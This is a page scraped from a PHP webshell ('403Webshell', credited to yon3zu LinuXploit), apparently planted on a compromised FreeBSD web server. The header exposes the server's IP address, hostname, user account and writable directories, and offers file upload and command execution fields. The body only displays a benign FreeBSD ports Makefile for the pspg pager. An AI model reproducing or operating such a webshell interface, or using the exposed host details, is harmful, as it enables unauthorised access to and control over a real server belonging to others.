403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/databases/pspg/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/databases/pspg/Makefile
PORTNAME=	pspg
DISTVERSION=	5.5.7
CATEGORIES=	databases

MAINTAINER=	dmgk@FreeBSD.org
COMMENT=	Tabular data pager designed to be used with psql
WWW=		https://github.com/okbob/pspg

LICENSE=	BSD2CLAUSE
LICENSE_FILE=	${WRKSRC}/LICENSE

USES=		autoreconf compiler:c11 gmake localbase ncurses:port pkgconfig \
		readline

USE_GITHUB=	yes
GH_ACCOUNT=	okbob

GNU_CONFIGURE=	yes

SUB_FILES=	pkg-message

PLIST_FILES=	bin/pspg man/man1/pspg.1.gz
PORTDOCS=	README.md

OPTIONS_DEFINE=		DOCS INOTIFY PGSQL
OPTIONS_DEFAULT=	INOTIFY PGSQL

INOTIFY_DESC=	Use inotify instead of polling
PGSQL_DESC=	Work as PostgreSQL interactive client

INOTIFY_LIB_DEPENDS=	libinotify.so:devel/libinotify
# configure script doesn't understand --with-inotify
INOTIFY_CONFIGURE_OFF=	--without-inotify
INOTIFY_LDFLAGS=	-linotify

PGSQL_USES=		pgsql
PGSQL_CONFIGURE_WITH=	postgresql=yes
PGSQL_VARS=		WANT_PGSQL=client

post-install:
	${STRIP_CMD} ${STAGEDIR}${PREFIX}/bin/pspg
	${INSTALL_MAN} ${WRKSRC}/pspg.1 ${STAGEDIR}${PREFIX}/man/man1/

post-install-DOCS-on:
	@${MKDIR} ${STAGEDIR}${DOCSDIR}
	${INSTALL_DATA} ${PORTDOCS:S|^|${WRKSRC}/|} ${STAGEDIR}${DOCSDIR}

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit